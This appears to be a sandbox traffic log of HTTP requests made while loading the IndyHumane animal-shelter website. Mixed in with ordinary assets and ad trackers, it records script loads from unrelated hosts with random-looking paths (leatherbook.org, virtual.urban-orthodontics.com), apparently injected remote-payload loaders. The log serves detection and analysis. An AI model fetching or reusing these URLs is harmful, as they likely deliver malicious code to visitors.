Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/11/317_logo_proposed_simpler_inverse-768x161.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/menu.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/e9dac8f4-5d42-4282-b360-1c17bf4033f7.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/fe090341-f359-4d15-a7d0-260c04791544.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/social-share.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SR0ymlWkoOcyiZuXCrFr3HWgupYiPaMXa-GLcDabjeW HTTP/1.1Host: leatherbook.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/12/dog-day-out2-768x723.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/11/317_logo_proposed_simpler_inverse-768x161.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/12/Toolbar-icon-with-language-symbol.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952098&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9= HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952107&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9= HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1Host: indyhumane.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_CDQ7BLPKF7=GS1.1.1736387952.1.0.1736387952.0.0.0; _ga=GA1.1.932040568.1736387953; _gcl_au=1.1.1223850198.1736387954
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/06/get-involved-home.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/06/clinics.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /track.js HTTP/1.1Host: secure.gaug.esConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/06/donate.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/up.js?um=1 HTTP/1.1Host: up.pixel.adConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/12/Toolbar-icon-with-language-symbol.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /track.js HTTP/1.1Host: secure.gaug.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /track.gif?h[site_id]=642b0b5c56d12352021fc47b&h[resource]=https%3A%2F%2Findyhumane.org%2F&h[referrer]=&h[title]=IndyHumane%20-%20IndyHumane&h[user_agent]=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&h[unique]=1&h[unique_hour]=1&h[unique_day]=1&h[unique_month]=1&h[unique_year]=1&h[screenx]=1280&h[browserx]=1280&h[browsery]=907&timestamp=1736387954872 HTTP/1.1Host: secure.gaug.esConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SR0ymlWkoOcyiZuXCrFr3HWgupYiPaMXa-GLcDabjeW HTTP/1.1Host: leatherbook.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b2?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952098&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9= HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=10Eb84084683af8249c0c7e1736387955; XID=10Eb84084683af8249c0c7e1736387955
Source: global trafficHTTP traffic detected: GET /b2?c1=2&c2=6745171&cs_it=b1&cv=4.12.0%2B2412121612&ns__t=1736387952107&ns_c=UTF-8&cs_cfg=1001110&c3=&c4=&c5=&c6=&c15=&c7=https%3A%2F%2Findyhumane.org%2F&c8=IndyHumane%20-%20IndyHumane&c9= HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: UID=1287479d2ea4f533b1a92731736387955; XID=1287479d2ea4f533b1a92731736387955
Source: global trafficHTTP traffic detected: GET /SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/12/dog-day-out2-768x723.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1Host: indyhumane.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.932040568.1736387953; _gcl_au=1.1.1223850198.1736387954; _gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1; _ga_CDQ7BLPKF7=GS1.1.1736387952.1.0.1736387955.0.0.0; _ga_VFFY2PDZ27=GS1.1.1736387955.1.0.1736387955.60.0.0
Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-VFFY2PDZ27&gacid=932040568.1736387953&gtm=45je5170v9118100243z8898710595za200zb898710595&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=1445872596 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/up.js?um=1 HTTP/1.1Host: up.pixel.adConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/1174527456525563?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dmp/asyncPixelSync HTTP/1.1Host: pixel-sync.sitescout.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /up/a9d63b08fec1b65f?cntr_url=https%3A%2F%2Findyhumane.org%2F HTTP/1.1Host: pixel.sitescout.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source=navigation-source, triggerReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /track.gif?h[site_id]=642b0b5c56d12352021fc47b&h[resource]=https%3A%2F%2Findyhumane.org%2F&h[referrer]=&h[title]=IndyHumane%20-%20IndyHumane&h[user_agent]=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F117.0.0.0%20Safari%2F537.36&h[unique]=1&h[unique_hour]=1&h[unique_day]=1&h[unique_month]=1&h[unique_year]=1&h[screenx]=1280&h[browserx]=1280&h[browsery]=907&timestamp=1736387954872 HTTP/1.1Host: secure.gaug.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dmp/asyncPixelSync?cookieQ=1 HTTP/1.1Host: pixel-sync.sitescout.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ssi=8b05cf9f-7156-4e8e-80d8-30a255c1b07a#1736387957364
Source: global trafficHTTP traffic detected: GET /j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-57291413-5&cid=932040568.1736387953&jid=1658224420&gjid=1630441865&_gid=1054392251.1736387956&_u=YCDAiEABBAAAAGAAI~&z=1577462971 HTTP/1.1Host: stats.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /up/a9d63b08fec1b65f?cookieQ=1&cntr_url=https%3A%2F%2Findyhumane.org%2F HTTP/1.1Host: pixel.sitescout.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source=navigation-source, triggerReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597
Source: global trafficHTTP traffic detected: GET /signals/config/1174527456525563?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
